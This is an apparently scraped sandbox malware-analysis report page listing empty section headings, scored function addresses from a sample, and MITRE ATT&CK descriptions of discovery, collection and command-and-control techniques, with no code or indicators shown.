Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Function 001A19A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Function 001A1E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 02CE7A2E, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 02CE9A0F, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 001A1C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 001A1264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 001A1703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 02CE9BF1, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Function 02CEA85C, Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Function 02CEAC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 02CE7C3D, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 02CE8E0D, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 02CEA2C6, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 001A1000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 02CE2789, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Function 02CE97F7, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Function 02CE2F70, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 02CE2D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Function 001A1D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Function 001A14AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 02CE1128, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Function 02CE5319, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 001A1BAE, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 02CE4A2A, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Function 02CE46B2, Relevance: 3.9, APIs: 3, Instructions: 152
stringCOMMON

Function 02CE76E7, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 001A13C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Function 02CE831C, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 02CE7EFD, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 02CE7DDD, Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre